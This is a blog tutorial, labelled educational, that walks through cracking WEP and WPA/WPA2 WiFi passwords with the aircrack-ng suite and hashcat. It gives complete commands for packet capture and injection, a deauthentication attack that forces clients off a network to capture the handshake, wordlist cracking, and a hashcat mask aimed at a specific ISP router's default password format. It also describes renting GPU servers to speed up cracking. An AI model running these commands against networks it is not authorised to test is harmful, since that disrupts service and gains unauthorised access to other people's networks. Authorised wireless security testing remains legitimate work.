This whole blog and including this post is just for educational purposes and do not do anything to a WIFI network that does not belong to you or that you have written permission to do so.

Hacking WIFI with WEP encryption is very simple.

First, listen for any WIFI running WEP nearby:

airodump-ng wlan0 --encrypt wep

Replace the channel number (1 in the example) and the MAC address (FF:FF:FF:FF:FF:FF in the example) with the data from airodump:

basside-ng wlan0 -c 1 -b FF:FF:FF:FF:FF:FF

The preview command keeps capturing IV packages, which are the type of packages used to crack WEP. First, it does injection and then later it does flood.

It is going to give you the hex version of the password, so use it to get the ASCII version of it:

aircrack-ng ./wep.pcap

Another way may take a bit longer because the is no packet injection to speed up the process, but works fine too.

Once you know the channel and the BSSID (MAC of the router) you run the following commands in two different terminals:

airodump-ng wlan0 -c 1 -b FF:FF:FF:FF:FF:FF
aircrack-ng ./wep.pcap

Airodump will be capturing packets in one terminal while aircrack will be re-checking the file every 5000 packets until it gets enough information to crack the password.

The basics about cracking a WIFI that uses WPA/WPA2 are capturing the 4-way handshake and use the acquired data into hashcat to recreate the password using brute force.

To capture the handshake a device has to connect to the network, and this can be a long waiting process or maybe kick one device off and wait for it re-connect. Not a big deal!

The hash cracking part is more critical because it can use a public passwords list, or another passwords list you created using tools like CUPP in combination or not with Mentalist.

Changing the wireless adapter to monitor mode, check the mode changed, and start grabbing packages:

sudo airmon-ng start wlan0
iwconfig
sudo airodump-ng wlan0mon

The tool will do a channel hopping and will find out all the reachable routers and the devices connected to them.

sudo airodump-ng -c1 -w output_file -d FF:FF:FF:FF:FF:FF wlan0mon

Note that -c1 means channel 1 and FF:FF:FF:FF:FF:FF represents the MAC address of the desired router.

Then in another terminal try to disconnect one of the clients.

sudo aireplay-ng --deauth 0 -a FF:FF:FF:FF:FF:FF -c EE:EE:EE:EE:EE:EE wlan0mon

The first argument 0 is the rate of the packets to be sent, -a is the access point, and -c is the client.

On the airodump terminal, you may see at the top “WAP handshake: FF:FF:FF:FF:FF:FF“, which means the handshake was captured and the process can be stopped.

sudo airmon-ng stop wlan0mon

If you open the output_file.pcap file with the Wireshark, filter by “eapol“, which stands for Extensible Authentication Protocol (EAP) over LAN, to see the 4-way handshake.

Now use a wordlist to see if any of the words match with the password.

aircrack-ng output_file.pcap -w /usr/share/dict/words

The wordlist above is just a dictionary and contains a very limited number of possibilities, consider using Rock You or creating the list yourself based on the information you have: SSID (can indicate the internet provider) and MAC (informs who manufactured the hardware) to guess the password pattern.

For example, for Bell Canada, the modem Home Hub 3000 uses a password 12 characters long and each digit contains an upper-case hex (1-F).

hashcat -m 2500 -a3 handshake.hccapx ?H?H?H?H?H?H?H?H?H?H?H?H

Don’t be disappointed if you find the estimated time o finish around 1800 years. Find a high-performance GPU, and face the challenge 🙂

Using Linode GPU computing to crack the password hash:

  • Linode Plan: Dedicated 32GB + RTX6000 GPU x1
  • Hourly: $1.50 ($1000/month)
  • RAM: 32 GB
  • CPUs: 8
  • Storage: 640 GB

Setting up the system:

sudo apt update
sudo apt install hashcat -y
wget https://downloads.hpe.com/pub/softlib2/software1/pubsw-linux/p87865808/v171517/NVIDIA-Quadro-RTX6000-Linux_Driver-418.43.tar.gz
tar zxvf NVIDIA-Quadro-RTX6000-Linux_Driver-418.43.tar.gz
chmod +x NVIDIA-Linux-x86_64-418.43.run
./NVIDIA-Linux-x86_64-418.43.run
hashcat -I
sudo apt install gcc make build-essential linux-headers-$(uname -r) -y

Even reducing from 1809 to 10 years it stills not practicable even with a high-performance GPU to crack such a long password.

The same test was performed on the ColabCat, follow the results:

Read more about it on the post Cracking Hashes with HashCat in Google Cloud Colab [Link].